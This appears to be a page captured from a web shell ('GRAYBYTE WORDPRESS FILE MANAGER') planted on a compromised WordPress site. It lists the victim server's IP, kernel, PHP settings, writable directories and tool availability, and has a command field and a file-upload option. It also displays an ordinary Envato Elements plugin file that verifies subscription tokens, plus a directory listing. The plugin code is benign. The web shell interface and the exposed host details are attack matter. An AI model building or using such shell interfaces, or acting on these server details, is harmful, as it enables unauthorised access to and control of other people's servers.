GRAYBYTE WORDPRESS FILE MANAGER9112

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/giriqfky/chahida.co.in/wp-content/plugins/envato-elements/inc/api/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/giriqfky/chahida.co.in/wp-content/plugins/envato-elements/inc/api//class-subscription-api.php
<?php
/**
 * Envato Elements: Subscription API
 *
 * Search API
 *
 * @package Envato/Envato_Elements
 * @since 2.0.0
 */

namespace Envato_Elements\API;

use Envato_Elements\Backend\Subscription;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Subscription API
 *
 * @since 2.0.0
 */
class Subscription_API extends API {

	/**
	 * @param $request \WP_REST_Request
	 *
	 * @return \WP_REST_Response
	 */
	public function verify_extensions_token( $request ) {

		// This is the user provided token that comes from the front end UI:
		$extensions_token = trim( $request->get_param('token') );

		if(!$extensions_token){
			return $this->format_error(
				'verifyElementsToken',
				'missing_data',
				'Please provide a token'
			);
		}

		$subscriptionClass = Subscription::get_instance();
		$token_response = $subscriptionClass->verify_token_and_cache_user_info($extensions_token);

		if($token_response['valid']){
			// we received a valid token from Extensions API
			if($token_response['status'] === $subscriptionClass::SUBSCRIPTION_PAID) {
				// return success if they have a paid subscription:
				return $this->format_success( $token_response );
			}else{
				// return failure if they haven't an active paid subscription
				return $this->format_error(
					'verifyElementsToken',
					'no_paid_account',
					'Verification Failed - you need a paid, Envato Elements subscription to continue'
				);
			}
		}else{
			// token was invalid, see if we have an 'error' code from Extensions API:
			if(!empty($token_response['error']) && !empty($token_response['error']['code'])){
				return $this->format_error(
					'verifyElementsToken',
					$token_response['error']['code'],
					$token_response['error']['message']
				);
			}
			// Unknown error from verification process:
			return $this->format_error(
				'verifyElementsToken',
				'invalid_token',
				'Invalid token provided',
				$token_response
			);
		}
	}

	public function register_api_endpoints() {
		$this->register_endpoint( 'verifyExtensionsToken', [ $this, 'verify_extensions_token' ] );
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:29
giriqfky / giriqfky
0755
.htaccess
0.41 KB
July 10 2025 04:32:29
giriqfky / giriqfky
0644
class-api.php
1.495 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-banners.php
1.086 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-photos-import.php
5.984 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-photos-search.php
1.803 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-project-name.php
1.092 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-requirements.php
9.783 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-settings.php
12.623 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-subscription-api.php
2.05 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-import.php
16.31 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-install.php
8.651 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644
class-template-kit-search.php
4.726 KB
March 07 2025 11:33:34
giriqfky / giriqfky
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF